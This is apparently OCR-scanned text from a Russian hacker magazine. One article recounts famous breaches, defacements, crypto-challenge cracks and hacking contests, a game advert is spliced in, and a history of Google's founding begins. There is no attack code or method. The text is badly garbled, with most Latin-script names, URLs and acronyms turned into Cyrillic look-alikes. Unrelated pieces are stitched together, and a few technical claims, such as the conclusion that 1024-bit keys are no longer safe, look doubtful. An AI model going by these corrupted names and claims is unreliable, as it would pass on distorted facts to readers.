от взлома? 

НА ЗЕСІІВІТѴ-САЙТАХ ЧАСТО МОЖНО ПРО- 
ЧИТАТЬ ОБ ОПЕРАЦИОНКАХ, ГАРАНТИРУЮ- 
ЩИХ АДМИНУ СТОПРОЦЕНТНУЮ БЕЗОПАС- 
НОСТЬ, О НЕПРОХОДИМЫХ ФАЙРВОЛАХ, 
КРИПТОАЛГОРИТМАХ, С КОТОРЫМИ МОЖНО 
ЗАБЫТЬ О ХАКЕРАХ НА БЛИЖАЙШИЕ ЛЕТ ДЕ- 
СЯТЬ. НО ДОСТАТОЧНО ЗАЙТИ НА БАГТРАК, 
ПОСМОТРЕТЬ НА КОЛИЧЕСТВО ДЫР КРУГОМ, 
И ВМЕСТО НАДЕЖНЫХ ЗАМКОВ ТЫ УВИ- 
ДИШЬ ПЕРЕД СОБОЙ ХРУПКИЕ ЗАЩЕЛКИ, 
СЛОМАТЬ КОТОРЫЕ — ЕДВА ЛИ ПРОБЛЕМА. 
ТЕМ НЕ МЕНЕЕ, СРЕДИ МНОЖЕСТВА КОМ- 
ПЬЮТЕРНЫХ СИСТЕМ, ПРОГРАММ И ДЕВАЙ- 
СОВ ЕСТЬ ТАКИЕ, КОТОРЫЕ ДАЮТ ОТПОР 
ДАЖЕ САМЫМ МАТЕРЫМ ХАКЕРАМ. Я РАС- 
СКАЖУ ТЕБЕ О САМЫХ КРУТЫХ ЗАЩИТАХ 

МИРА I Илья Александров (Пуа_а1@гатЫег.ш) 

Самые защищенные 
компьютерные системы 

[оси] Установленная на компьютере операцион- 
ная система — ключевой фактор в безопасности 
ПК. В 2004 году английская зесигііу-компания ті2д 
проводила исследование, целью которого было 
выявление самых безопасных ОС. Наиболее уяз- 
вимыми оказались многострадальная винда и по- 
лучивший огромную популярность на рынке серве- 
ров І_іпих, который уже давно не тянет на звание се- 
курной операционки. Самыми стойкими были 
объявлены Мае ОЗ и семейство *В30. Но если по- 
зиции ВЗО под сомнение никто не ставит, то разра- 
ботка от Арріе в список явно попала по недоразу- 
мению. Во-первых, система мало распространена, 
а уж на серверах и подавно, во-вторых, макинтош 
всегда был ориентирован на начинающих пользо- 
вателей и дизайнеров, а не на системных админи- 




страторов. В конце августа этого года Арріе выпустила патч, устраняющий 40 
(сорок!) уязвимостей в ОС. Ранее, известная фирма Зутапіес в своем бюлле- 
тене Іпіегпеі Зесигііу ТПгеаІ Верогі описала около 37 дыр в защите Мае ОЗ. Ко- 
нечно, на сегодняшний день они практически все неактуальны, существуют 
заплатки и обновления, но где гарантия, что завтра не будет найдена еще од- 
на критическая уязвимость? Так что если ты юзаешь мак и думаешь, что жи- 
вешь в параллельном с хакерами мире, ты сильно ошибаешься. 

Отдельно хочется выделить ОрепВЗО. Разработчики ОСи изначально 
ставили перед собой задачу создать максимально безопасную систему, 
и это ребятам удалось. Нет, баги есть и в ОрепВЗО, но, во-первых, их уж 
очень мало, во-вторых, патчи появляются моментально. Но самой безо- 
пасной системой на планете является не детище Тео Де Раадта и ко. Са- 
мым высоким классом защиты, согласно документу «Критерии оценки 
надежных компьютерных систем», созданному агентством национальной 
безопасности США, обладает ХТЗ-ЗОО ЗТОР. Вероятно, ты даже не слы- 
шал о подобной ОС. Это продукт компании ѴѴапд РебегаІ, который, поми- 
мо операционки, включает в себя и аппаратную часть на основе процес- 
соров Іпіеі. ХТЗ-ЗОО базируется на ІІІМІХ, поддерживает одновременно до 
двухсот процессоров, используется же чаще всего в военных структурах. 
Уместной будет цитата известного русского секьюрити эксперта ЗАРА- 
Зы: «Чем бесполезней ОС, тем она безопасней». При всем уважении к 
ХТЗ-ЗОО, ОІМХ и прочим экзотическим системам, их функциональности 
зачастую бывает недостаточно, и люди ставят пусть и менее защищен- 
ные, но куда более продвинутые и распространенные системы. 
Продолжая тему юникс, скажу пару слов о вирусах. Невероятно, но мно- 
гие обитатели *піх до сих пор свято верят в то, что вирусов под І_іпих и 
ВЗО нет. А ведь первый широко известный вирус — червь Морриса — 
поражал именно 4 ВЗО ІІІМІХ. В 2001 году сетевой вирус ЗабтіпсІ доста- 
вил немало проблем пользователям ЗІІІМ Зоіагіз, а в 2002 червь ЗІаррег, 
используя ошибку переполнения буфера в ОрепЗЗЦ инфицировал по- 
рядка 20 000 машин с установленным на них І_іпих. Список может быть 
продолжен. Друг юниксойд, не играй с огнем — антивирус Касперского 
и ОВ.ѴѴЕВ существуют и под твоей любимой системой! 

Самая вирусоустойчивая система — это, конечно же, МАС ОЗ, но мак- 
ровирусы существуют и здесь. Да и не могут не существовать — ведь 
это скрипты, созданные для определенного программного продукта, и 
их работа от типа ОС не зависит. 



ТАКТИЧЕСКАЯ СТРАТЕГИ! С ЭЛЕМЕНТАМИ КИДАЛИ! 
САМАН РЕАЛЬНАЯ ИГРА О САМЫХ РЕАЛЬНЫМ ПАЦАНАХ! 
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[сайты] Вполне возможно что ты, 
несмотря на все наши предостере- 
жения, занимался взломом ѵѵеЬ- 
порталов. Может быть, заменял 
индексную страницу порнографи- 
ческими изображениями, стирал 
базы данных, пользовался конфи- 
денциальной информацией. Хотя 
вряд ли в твоей коллекции был 
правительственный ресурс, сайт 
крупной корпорации, или хотя бы 
захудалый поисковик. Все это ты 
считал неуязвимыми порталами, 
за которыми следят крутые сисад- 
мины. Иного мнения придерживал- 
ся 15-летний канадский хакер, на- 
зывающий себя МаІіаЬоу. Захва- 
тив несколько университетских 
серверов, юный взломщик создал из них площадку для организации 
ООоЗ-атак. А ддосить решил не что-нибудь, а СЫЫ, Ѵаііоо! и Атагоп, 
вырубив эти крупнейшие сайты на несколько часов. Потери от атаки со- 
ставили около миллиарда долларов, в эту сумму входит и падение ак- 
ций ряда компаний, зависимых от Интернета. МаІіаЬоу попался из-за 
лишнего хвастовства в ІВС-чате. Парень извинился, сказал, что больше 
не будет, но с тех пор к компу он подходит только под наблюдением учи- 
теля. Интернет-сообщество тогда было потрясено, что такой ресурс, как 
УаИоо, может блокировать даже 15-летний подросток. 

Дефейснуть МісгозоК.сот мечтал каждый хакер. Оказывается и этот, 
без сомнения, один из самых защищенных ресурсов сети, можно ло- 
мать. Ребята из ОиНаѵѵ Огоир в 2004 году на одной из страниц портала 
(полностью порутать сервак им не удалось) оставили свой дефейс. Если 
интересно, полюбоваться им можешь тут: ѵѵеЬ-Ьаск.ги/беіасеб/тісю- 
зоіі.сот.ірд. Не отстают и бразильские взломщики — команда Іпзапііу 
2іпе Согр изменила индексную страницу Місгозоіі.сот на бразильском 
языке — ѵѵѵѵѵѵ. тісгозоН. сот/ЬгазіІ/. 

Ломают, впрочем, не только мелкомягких. Портал компании Азиз в свое 
время был взломан неким 14тЗ, на главной странице хакер написал: 
беіасесі Ьу 14тЗ кІсІсІІЗ Іиск НаскрПгеак апб Фа* зіирісі сІіскНеасІ гіохіеу. 
Как я понял, чувак этим хотел сказать, что он — очень крутой, а хакеры 
ИаскрИгеак и гіохіеу — ламошники поганые. При чем здесь известный 
производитель комплектующих непонятно, ну да и ладно. 

Веб-сайт армии США ѵѵѵѵѵѵ. агту.ті! по праву находился на первом месте 
различных топов из разряда «порталы, которые невозможно взломать». На- 
ходился, пока 20-летний Чад Дэвис не написал на стартовой странице Нас- 
кеб Ьу ОІоЬаІ НеІІ. Правда, вместе с мировой славой крутого хакера Чад по- 
лучил штраф в 10 тысяч долларов и около года тюрьмы, но это уже детали. 
ВЗА Зесигііу іпс — известнейшие специалисты в области криптографии. 
Логично было бы предположить, что их портал защищен не хуже крип- 
тоалгоритмов. Увы, квалификации системных администраторов сайта 
ѵѵѵѵѵѵ. гза. сот оставляет желать лучшего — сайт был задефейсен неиз- 
вестными хакерами, что сильно подорвало репутации ВЗА Зесигііу. 
Продолжать рассказывать о взломанных сайтах можно еще долго. Но я 
думаю, ты и так понял, что любой портал в Сети, каким бы крутым бы он 
не был, может быть взломан. 

[сети] Пентагон, НАСА... в фильмах, если хакер сумел взломать 
сети этих организаций, он считается очень крутым. Но насколько 
круты сами сети? 

Компьютерная сеть министерства обороны США — одна из самых 
больших в мире. На содержание своих ком- 
пьютеров Пентагон тратит порядка 1,8 мил- 
лиардов долларов в год. Недавно в мини- 
стерстве обороны ввели шкалу «состояния 
боевой готовности» к компьютерным ата- 
кам, по аналогии со шкалами военной и тер- 
рористической угрозы. В зависимости от со- 
стояния шкалы армия переводится в соот- 
ветствующее состояние готовности, что по- 
могает скоординировать действия во время 
чрезвычайных ситуаций. 

После вирусных эпидемий ШоѵеУои и ВІаз* по- 
добное создали и в компьютерной области. 

Я, признаться, не понимаю, как армия США спа- 
сет Интернет от вирусных эпидемий, но тем не 
менее. Серверы в Пентагоне максимально за- 
щищены, на них установлено новейшее ПО, са- 
мые важные серверы не подключены к глобаль- 



ной сети, чтобы избе- 
жать внешнего втор- 
жения. Несколько ты- 
сяч профессиональ- 
ных системных адми- 
нистраторов следит за работой сети. 

Первым хакером, сознавшимся во взломе сетей Пентагона, стал из- 
раильтянин Эхуд Тенебаум, в андеграунде известный как Апаіугег. 
Инцидент случился во время усиления напряженной обстановки в ра- 
йоне персидского залива, и правительство США было уверено, что 
это попытки Ирака помешать развертыванию вооруженных сил в этом 
районе. Но привлеченные к расследованию ЦРУ и ФБР быстро вышли 
на изральского хакера, который к Саддаму Хусейну ни малейшего от- 
ношений не имел, а взлом совершил просто так, в исследователь- 
ских, так сказать, целях. ФБР даже выпустило короткий документаль- 
ный фильм о том, как в штатах ловят хакеров. Впрочем, доступа к 
конфиденциальной информации взломщик не получил, благодаря че- 
му отделался сроком в полгода. Куда дальше пошел англичанин Гар- 
ри Маккиннон — безработный сисадмин из Лондона. Вычислив ір-ад- 
реса сети министерства обороны (что для профессионала труда не со- 
ставит), Маккиннон через дыры в системах безопасности получил ад- 
министративные права на некоторых компьютерах, с которыми пове- 
селился на славу. Удалил из системы 1300 аккаунтов, поудалял мно- 
жество важных файлов, не забыв кое-что скопировать себе, и поднял 
привилегии до рутовых на 100 компьютерах. 

Обнаружив следы деятельности Гарри, военные, ликвидировав все не- 
поладки, начали расследование этого дела. Выйдя на жителя туманно- 
го Альбиона, ФБР объявило Маккиннона в международный розыск. Все- 
го на это дело было потрачено около миллиона (!!!) долларов, в то вре- 
мя как урон от действий хакера составил не больше сотни тысяч. Свой 
взлом Гарри объяснил тем, что хотел посмотреть информацию о суще- 
ствовании инопланетян, предположив, что у Пентагона есть сведения о 
зеленых человечках. Не знаю, нашел ли что-либо стоящее Маккиннон, 
но светит дядьке очень большой срок в местах не столь отдаленных.. 
Еще одна организация, которая в представлении не нуждается и ком- 
пьютеры которой должны быть хорошо защищены — аэрокосмическое 
агентство ЫАЗА. Именно здесь ведутся разработки и исследования пе- 
редовых технологий, осуществляется управление спутниками, космиче- 
скими кораблями и шатлами. Доступ к информации такого рода строго 
засекречен. Но 20-летний американец Раймонд Торричелли легких пу- 
тей не искал — именно НАСА стала целью его взлома. На одном из пра- 
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вительственных компьютеров Раймонд установил.. ІВС-сервер для бе- 
сед со своими друзьями из хакгруппы Сопііісі. А на одном из серверов 
был установлен снифер, отлавливающий пароли пользователей Гос- 
Университета Сан-Хосе. Хакер был арестован в собственном доме, пря- 
мо за компьютером, на котором нашлись все доказательства его вины. 
Штраф на 250 000 долларов и тюремное заключение — такова плата за 
размещение ІВС-сервера на правительственном компьютере. 
Справедливости ради надо сказать, что ничего особо страшного хаке- 
ры не наделали, и, пожалуй, не могли наделать. Запустить ядерные 
боеголовки или послать спутник на новую орбиту у взломщиков воз- 
можности нет. Пока нет... 

Ты наверняка наслышан о краже исходников винды. Хакеры завладели 
ими, запустив в корпоративную сеть компании червя Оа т, перехваты- 
вающего все пароли. Видимо, какой-то сотрудник получил зараженное 




письмо и открыл аттач с заразой, а антивиру- 
са на компьютере не было. Перехватив па- 
роль, злоумышленник получил доступ к систе- 
ме и скачал с одного из серверов исходные ко- 
ды операционных систем ѴѴіпсІоѵѵз ЫТ 4 и ѴѴіп- 
сіоѵѵз 2000. Все вышесказанное не официаль- 
ные факты, а гуляющие по Сети слухи, не в ко- 
ем случае на объективность не претендующие. 
Тем не менее, исходные коды операционок 
действительно можно было обнаружить в фай- 
лообменных сетях. Но никакой вирусной эпидемии и обилия эксплой- 
тов под винду не последовало — опасность оказалась гораздо менее 
страшной, чем предполагали эксперты. Но главное даже не это, а то, 
что даже такая корпорация, как Майкрософт, не может сохранить все 
свои тайны в безопасности. Что уж говорить о других компаниях? 



Майкл Робертсон — 
спонсор взлома ХЬох 



[криптография] Фирма Сегіісот в мире криптографии известна своим 
алгоритмом ЕСС. Алгоритм намного экономичней и безопасней попу- 
лярного ВЗА, 164-битный ЕСС эквивалентен 1024-битному ВЗА. Сегіі- 
сот согласна была выплатить награду в 10 тысяч долларов тому, кто су- 
меет произвести расшифровку алгоритма. Французские энтузиасты 
свободного ПО, работая полгода и используя 597 компьютеров, сумели 
взломать ЕСС длиной в 108 бит. Они получат только 2 тысячи, осталь- 
ные деньги пойдут в фонд развития свободного ПО. 

Этот взлом оказался очень важным — он показал, что даже 1024-бит- 
ный ключ уже не дает стопроцентной защиты, и новые алгоритмы не яв- 
ляются выходом из положения. 

Еще один нашумевший хак совершили шведские криптографы, рас- 
шифровавшие алгоритм Саймона Сайна. Сайн — профессор физики в 
кембриджском университете, автор «Книги кодов» — учебника по 
криптографии. Он и его помощники написали 10 кодов различной 
сложности, потратив на разработку около года, и считали свои алго- 
ритмы фактически неуязвимыми. Саймон даже объявил награду за 
взлом всех 10 кодов — 15 килобаксов. Фредерик Альмгрен заинтере- 
совался этими алгоритмами потому, что они используются в системах 
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СВѴРТО ОАТА 



даже самый надежный 
криптоалгоритм можно взломать 



самая секурная ОС ОрепВЗО 



безопасности онлайновых банков и магази- 
нов. Фредерик разгадал все шифры, проде- 
монстрировав миру слабость криптографии, 
использующейся в ѵѵеЬ. 

На сегодняшний день самым надежным алгоритмом считается стан- 
дарт шифрования США — НцпсІаеІ. Бельгийскую разработку, поб- 
едившую в конкурсе АЕЗ, поломать еще не успели. Пока не успели. 
По-настоящему неприступный алгоритм можно создать лишь при ис- 
пользовании квантовой криптографии, которая на сегодняшний день 
слишком слабо изучена. 

[конкурсы] Ты наверняка слышал или читал в ][ о взломе игровой при- 
ставки ХЬох, на которую умельцы умудрились поставить Ыпих. Но знал 
ли ты, что хакеры делали это не интереса ради, а за очень хорошее воз- 
награждение — 250 000 долларов. В 2002 анонимный спонсор разме- 
стил на \/ѵ\/ѵ\/ѵ .зоигсеіогде .сот сообщение о том, что согласен выплатить 
эту сумму тому, кто приспособит игровую консоль к линуху. Как оказа- 
лось, этим спонсором был Майкл Робертсон — исполнительный дирек- 
тор компании Ыпсіоѵѵз, известный своими попытками скрестить Ыпих и 
ѴѴіпбоѵѵз. Как объяснил он сам, Майкл сделал это для того, чтобы дать 
людям выбор — мол, монополии не место в демократическом обществе. 
В хакерской среде довольно популярным и авторитетным является 
конкурс орепііаск.сот. Этот проект компании еѴѴеек І_аЬз создан для 
выявления уязвимостей в популярных программных продуктах и для 
помощи предприятиям, работающим в сфере электронной коммер- 
ции. Во время первого конкурса на сайте ѵѵѵѵѵѵ .орепЬаск.сот был 
размещен онлайновый магазин с мейл-сервером и базой данных. 
Физически сервер, на котором располагался сайт, находился в То- 
ронто, в фирме ОиагсІепЦ специализирующейся на интернет-защите. 
Желающим предлагалось попробовать его взломать. ОрепПаск 
включал в себя несколько подсетей, в которых использовались са- 
мые различные ОС: Зоіагіз, Ыпих, ОрепВЗО ѴѴіпбоѵѵз І\ІТ. Настраи- 
вать защиту сервера помогали специалисты по безопасности из Міс- 
гозоК и Зип, а роль брандмауэра выполнял аппаратный файрвол от 
Ахепі ТесИпоІодіез. За повреждения веб-сервера взломщик получал 
500 долларов, за уничтожение мейл-сервера — 1500, а за получение 
доступа к базе данных — две с половиной тонны вечнозеленых пре- 
зидентов. Победителем стал консультант по ИТ-защите Луис Мора. 
На пути к базе данных хакер нашел 3 уязвимости в скриптах элек- 
тронного магазина МіпіѴепб и 1 уязвимость в ОС Зоіагіз. 

На третьем конкурсе опенхака сумма главного приза составила уже 
50 000 долларов. Оно и понятно — хакерам нужно было взломать РіІВиІІ, 
программу компьютерной защиты компании Агдиз Зузіетз Огоир. Пит- 
буль — новое слово в ИТ-безопасности, система, работающая с ОС на 
уровне ядра, контролирующая доступ к ФС и процессам. Все разработ- 
ки были закрытыми, и никто толком не знал, что представляла собой за- 
щита. РіШиІІ стал единственной преградой, которую хакерам на конкур- 
се ОеГСоп не удалось взломать. И на ОрепНаск 3 программа вновь ока- 
залась неуязвимой. Впрочем, этому можно найти другое объяснение, 
помимо неприступности ПО. Хакеры — суперпрофессионалы, они вряд 
ли будут светиться на подобных конкурсах даже за 50 тысяч баксов, а у 
обычных энтузиастов просто не хватило квалификации. 

Еще одну халтуру подкинула гикам МогіІІа Роипбаііоп — за 5 найденных 
ошибок в своем огнелисе она будет выплачивать по 2500 долларов. 
Пять человек уже получило свои деньги, можешь успеть и ты — про- 
грамма «деньги за 5 ошибок» еще действительна. 

Криптоаналитики могут заполучить машину Реггагі 360. Не просто так, 
конечно, а за взлом системы шифрования компании МедаЫеІ. Скачай с 
сайта ѵѵѵѵѵѵ.тедапеі.сот файл Іеггагі.ѵте, весящий всего лишь 147 ки- 
лов, и извлеки оттуда документ. Извлечешь — тебе отправят автомо- 
биль. Правда, расходы по транспортировке за твой счет, но думаю, это 
не омрачит радости от победы. 

Если ты любил в школе решать математические задачки, попробуй се- 
бя в конкурсе Вобасіоп ТесІіпоІодіез. Каждый участник получает после- 
довательность из 999 чисел, сгенерированных специальным алгорит- 
мом. Задача — найти тысячное число. Твоя награда составит 10 тысяч 



убитых енотов, но сразу предупреждаю — за последний год 
никто так и не сообразил, по какому алгоритму расположе- 
ны числа... 

Не так давно компания ЗЭМІ, рекламируя свои средства за- 
щиты музыкальных записей от копирования, пообещала каж- 
дому, кто сможет взломать ее алгоритмы 1 0 000 долларов. 
Пообещала зря, потому что группа американских иссле- 
дователей всего через несколько дней после начала кон- 
курса не оставила от защиты и следа. ЗЭМІ поняв, что по- 
сле этого продавать свою продукцию будет проблематич- 
но, объявила, что взлом невозможен без ухудшения каче- 
ства звучания, а если это кому-то и удалось, то исключи- 
тельно случайно. Денег своих хакеры так и не получили, 
хотя лучшим подтверждением слабости алгоритмов ЗЭМІ 
является обилие пиратских дисков на любом рынке. 



[итоги] В этой статье я хотел рассказать тебе о программных продук- 
тах, которые не смогли сломать крэкеры. Но, как оказалось, ломали все: 
от мелких утилит до операционных систем. Единственная защита, кото- 
рую действительно крэкнуть невозможно — это демоверсии, где поль- 
зователь получает полнофункциональную программу лишь после того, 
как ее купит. Примером такой программы может служить Хзрібег, для 
седьмой версии которого крэка не существует. 

На рынке защит от копирования СЭ-дисков лидирует ЗіагРогсе — все 
остальные ломаются в домашних условиях за десять минут. ЗіагРогсе 
же до сих пор считается неуязвимым, хотя каждый наш читатель знает, 
что достаточно прямых рук и программы Алкоголь 120%, чтобы копир- 
нуть диск с данными. А самый безопасный протокол связи и передачи 
данных — ОрепЗЗН. Не отстает от него и ззН2 от компании ОаІаІеІІоѵѵз, 
который является закрытой коммерческой разработкой и считается од- 
ним из самых секурных. 

Надеюсь, после прочтения этой статьи ты понял, что абсолютная защи- 
та — это что-то из жанра научной фантастики. Взломать, действитель- 
но, можно все. Вопрос во временных и материальных затратах. И, как 
показывает практика, эти затраты не являются заоблачными © 




агті.тіі — самый важный правительственный сайт США 
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История одного 
поисковика 

В 1938 ГОДУ В ЖУРНАЛЕ ЗСВІРТА МАТНЕМАТІ- 
СА БЫЛА ОПУБЛИКОВАНА НАУЧНАЯ РАБОТА 
АМЕРИКАНСКОГО МАТЕМАТИКА ЭДВАРДА КАЗ- 
НЕРА, В КОТОРОЙ ВПЕРВЫЕ ИСПОЛЬЗОВА- 
ЛОСЬ СЛОВО «ГУГОЛ» (ѲООѲОЦ, ОЗНАЧАВ- 
ШЕЕ ЧИСЛО 10 В СОТОЙ СТЕПЕНИ, ТО ЕСТЬ 
ЕДИНИЦУ СО СТА НУЛЯМИ. ЭТО СМЕШНОЕ 
НАЗВАНИЕ ДЛЯ ЧИСЛА ПРИДУМАЛ ДЕВЯТИ- 
ЛЕТНИЙ ПЛЕМЯННИК КАЗНЕРА. СЕГОДНЯ СЛО- 
ВО «ГУГЛ», У КОГО НИ СПРОСИ, АССОЦИИРУ- 
ЕТСЯ СОВСЕМ НЕ С МАТЕМАТИЧЕСКОЙ ВЕЛИ- 
ЧИНОЙ, А С САМОЙ ПОПУЛЯРНОЙ ПОИСКО- 
ВОЙ СИСТЕМОЙ В ИНТЕРНЕТЕ. ОБ ИСТОРИИ 
СТАНОВЛЕНИЯ КОМПАНИИ ООООІ.Е И ПОЙДЕТ 
РЕЧЬ В ЭТОЙ СТАТЬЕ I Воззотаіпааг (гоззотаІпааг@ таіі.ги) 



Секреты успеха Ооодіе 

[Брин и Пейдж] История создания Ооодіе на- 
поминает ставшие уже знаменитыми истории 
Арріе или Неѵѵіеи РаскагсІ: «двое молодых лю- 
дей начинают претворять в жизнь свои идеи в 
гараже...». Но начнем с самого начала. 

Сергей Брин родился в Москве в 1973 году в 
семье математиков — его отец был школь- 
ным учителем, а дед преподавал математику 
в 50-х годах в МЭИ. В 1979 семья переехала 
из СССР в штаты по американской програм- 
ме эмиграции для лиц с еврейскими корнями. 
Там отец Сергея, Михаил Брин, стал препо- 
давать в университете штата Мэриленд, а 
мать работать в ЫА8А ученым специалистом. 
С самого детства он и его младший брат Сэм 
проявляли интерес к компьютерной технике. 
Первым компьютером Сергея был Соттобо- 



В основатели Ооодіе Іпс. 

Щ Эрик Шмидт, директор Ооодіе 



ге-64, подаренный ему отцом. Однажды первокласснику Брину уда- 
лось сильно удивить учителей школы тем, что он выполнил домаш- 
нее задание на компьютере и принес его распечатанным на принте- 
ре — в начале восьмидесятых даже в США персональные компьюте- 
ры были редким явлением. 

Окончив школу, Сергей, конечно же, поступает на факультет мате- 
матики университета Мэриленда, который он оканчивает досрочно, 
заработав себе престижную стипендию ІМЗОР. Стипендия позволи- 
ла ему продолжить обучение в Стэндфордском университете, при- 
чем принят он был сразу в докторантуру — университеты США 
иногда позволяют одаренным студентам перескочить через сте- 
пень магистра и идти от бакалавра сразу к докторской степени, а 
степень магистра аспирантуры получают уже в процессе обучения. 
Итак, в 1993 Брин покидает Мэриленд и переезжает в город Пало- 
Альто, расположенный в калифорнийской Кремниевой долине, где 
находится Стэндфордский университет. В 1995 году Сергей Брин 
получит степень магистра, планируя еще через два года стать док- 
тором технических наук со специализацией в информационных 
технологиях. 

В первый год обучения в Стэнфорде Сергей написал довольно интерес- 
ную программу, умеющую автоматически скачивать свежие фотки дев- 
чонок с сайта РІауЬоу и устанавливать их в качестве скинсейвера на его 
компьютере. Его сокурсники позднее отмечали, что впервые увидели 
тогда программу, находившую информацию в Интернете в автоматиче- 
ском режиме. Прожила эта программка совсем недолго (так как очень 
не понравилась подружке Сереги). Но тема поиска информации стала 
наблюдаться во многих научных работах Сергея. 

Лоренс Пейдж родился в семье знаменитого компьютерщика, одного из 
пионеров компьютеростроения, Карла Пейджа. Как и Сергея, Ларри с 
детства окружали компьютеры. Они были его главным увлечением, но 
особенно его интересовало «железо». 

После школы парень поступил в университет штата Мичиган, где его 
отец преподавал курс теории вычислительных систем. Существует 
интересная история о том, как Ларри однажды собрал модели черно- 
белого струйного принтера и плоттера из набора деталей конструкто- 
ра І_едо. Во время учебы он участвовал во многих университетских 
научных обществах, часто — в качестве руководителя. Окончив с от- 
личием университет, Пейдж решил продолжить свое обучение в элит- 
ном Стэнфорде. 

В марте 1995 года Ларри вместе с группой выпускников Мичиганско- 
го университета приехал в Стэнфорд. На тот момент ему было уже 24 
года. Ознакомить группу с университетом поручили Сергею Брину, 
который проучился там уже два года. 

Участники экскурсии впоследствии рассказывали, что Ларри и Сер- 
гей весьма не понравились друг другу — они начинали спорить по 
любому пустяку, каждый стремился доказать правильность своей 
точки зрения. Вероятно, на этой почве они и сошлись, став вскоре 
близкими друзьями. 





[Университетский Ооодіе] Сергей, получивший уже степень магистра, 
успел поучаствовать в реализации многих учебных проектов: он разра- 
батывал систему отслеживания нарушения авторских прав, участвовал 
в создании конвертора документов формата ТеХ в НТМІ_ (его использо- 
вали для публикации научных документов в Сети), создал сайт, на кото- 
ром осуществлялась рейтинговая оценка новых кинофильмов. Но все 
больше его занимали проблемы сбора данных. Он вступает в рабочую 
группу МЮАЗ (Міпіпд Эаіа а\ Зіапіогб). 

В этом же направлении вел свои исследования и Ларри Пейдж. Раньше 
не разделявшие идеи друг друга, Сергей и Лари впоследствии сходятся 
во мнении, что существующие поисковые системы крайне неэффек- 
тивны, и что необходимо выработать новый подход к поиску 
информации в Интернете. 

В конце 1 995-го они начинают вместе работать над сов- 
местным проектом под управлением доцента кафедры 
информатики и вычислительной техники Раджива Мо- 
твани. Их проект в общих чертах был готов уже к на- 
чалу 1996 года и представлял собой совершенно но- 
вый алгоритм поиска информации, технологию полу- 
чившую название Раде Вапк. Основная идея техноло- 
гии проста для понимания и состоит в следующем. 

Созданный парнями весной 1996 года поисковый сервер 
ВаскВиЬ анализировал так называемые обратные ссылки 
(Ьаск Ііпкз), то есть количество ссылок в Интернете, ведущих 
на данный сайт. Далее выстраивал иерархию сайтов, основываясь 
на полученных данных. Таким образом, реализуется основная идея, 
предложенная Пэйджем и Брином для эффективного поиска информа- 
ции: чем чаще имя сайта цитируется в Сети, тем более актуальную и 
нужную информацию для пользователя он содержит. В ответ на опреде- 
ленный запрос поисковик выводил ссылки, предварительно отсортиро- 
ванные по значимости. Сортировка эта осуществлялась не только путем 
анализа количества ссылок на данный сайт, но и анализа их качества — 
ссылка с сайта, занимающего высокое место в иерархии, имела 
больший удельный вес, чем ссылка с менее значимого, 
пропорционально их положению в общем рейтинге. 

Идея была описана в нескольких научных статьях, 
опубликованных Брином в американских акаде- 
мических журналах. 

Осенью 1996 года в комнате университет- 
ского общежития Ларри собирает мощный 
сервер, предназначенный для индексации 
интернет-сайтов. Хотя университет ча- 
стично профинансировал работу ребят, 
им пришлось влезть в долги на 15 тысяч 
долларов — потребовалось купить же- 
стких дисков общим объемом в 1 терабайт. 

Сергей, в свою очередь, занялся продвиже- 
нием проекта, превратив свою комнату в 
офис. Ребята предоставили всем учащимся 
Стэнфорда возможность использовать ВаскВиЬ 
для внутривузового поиска информации, а сами 
продолжили развивать свое детище. 

Запатентовав свою технологию поиска, Брин и Пейдж ре- 
шили продать ее какой-нибудь крупной интернет-компании, но из 
этой затеи ничего не получалось. Компании в то время 
весьма недальновидно рассматривали перспекти- 
вы поисковых сервисов, считая их чем-то 
второстепенным. Глава крупной в то вре- 
мя компании Ехсііе, Джордж Белл, 
объяснял ребятам, что на поиске де- 
нег не заработаешь, что лучше от- 
крыть бесплатный почтовый 
сайт и делать деньги на бан- 
нерных показах (через нес- 
колько лет Ехсііе обанкроти- 
лась). Несмотря на выне- 
сенный профессионалами 
интернет-бизнеса приго- 
вор о бесперспективности 
проекта, Сергей и Ларри 
продолжили его поддер- 
живать, не оставляя попы- 
ток его продажи. 

Примерно в это время их по- 
исковик обрел свое имя — 

Ооодіе. Парни немного изме- 
нили написание слова доодоі, 



В Сергей, Ларри и Эрик 
Ш Ларри Пейдж 
Ш Сергей Брин 



сделав его более благозвучным. Название как нельзя лучше отражает 
предназначение сервиса — структурировать огромное количество ин- 
формации, стремящееся своими объемами к числу гугол. Весь 1997 год 
поисковик использовали студенты Стэнфорда, пребывавшие от него в 
восторге. А в 1998 году бета-версия Ооодіе была запущена на сервере 
Стэндфордского университета. Найти его можно было по адресу 
ЫІр://доодІе.зіапІогсІ.есІи. В том же году Сергей Брин и Ларри Пейдж по- 
лучают возможность преподавать в университете. По вторникам и 
четвергам они ведут лекции по курсу «Анализ данных, поиск 
и Всемирная паутина». 

Летом 1998 года Сергей встретился с Дэвидом Фило, 
создателем ѴаЬоо! (кстати, тоже бывшим студентом 
Стэнфорда). На предложение Сергея о прода- 
же Ооодіе, Дэвид дал отказ и посоветовал 
тому заниматься не поисками покупателя 
данной технологии, а организовать соб- 
ственную компанию, специализирующуюся на 
поиске информации в Интернете. 

В этом году у Пейджа и Брина начались проблемы с ру- 
ководством университета. Им причислялось компьютер- 
ное хулиганство — робот Гугла не обращал внимания на 
файлы гоЬоіз.М, качая таким образом, внутреннюю университет- 
скую информацию. Кроме того, Ооодіе съедал 50% всего университет- 
ского трафика — им пользовалось уже около 10 тысяч человек в день. 
Сергею и Ларри дали понять, что дальнейшее присутствие их поисковой 
системы на сервере университета нежелательно. 

[Гараж Ооодіе Іпс.] В начале сентября 1998 года Сергей Брин встре- 
тился с Энди Бехтольшеймом, основателем компаний Зип Місгозу- 
зіетз и Огапііе Зузіетз. Сергей рассказал в общих чертах о 
возможностях новой технологии, показал Ооодіе в дей- 
ствии и уже хотел было подробно объяснить принци- 
пы работы поисковика, но Энди не стал даже вни- 
кать в детали. Он просто спросил: «На чье имя 
выписывать чек?». 

Чек на сумму 100 тысяч долларов был выпи- 
сан на еще не существующую компанию 
Ооодіе Іпс. Парни решили покинуть 
Стэнфорд (Брину оставалось всего 
полгода до защиты докторской дис- 
сертации), прихватив с собой Крей- 
га Сильверштейна. За несколько дней 
они подготовили все необходимые для ре- 
гистрации компании документы, собрали 
еще немного денег и нашли офисное поме- 
щение для своей фирмы. 7 сентября компания 
Ооодіе Іпс. была официально зарегистрирована 
и начала работу на следующий день, когда все три 
ее работника прибыли в гараж, расположенный в Мен- 
ло-Парке штата Калифорния. 

Теперь сайт поисковика обрел доменное имя доодіе.сот . В прессе 
все чаще стали появляться фразы: «умный поисковик» и 
такие крупные издания, как ІІ5А Тобау и І_е Мопбе. 
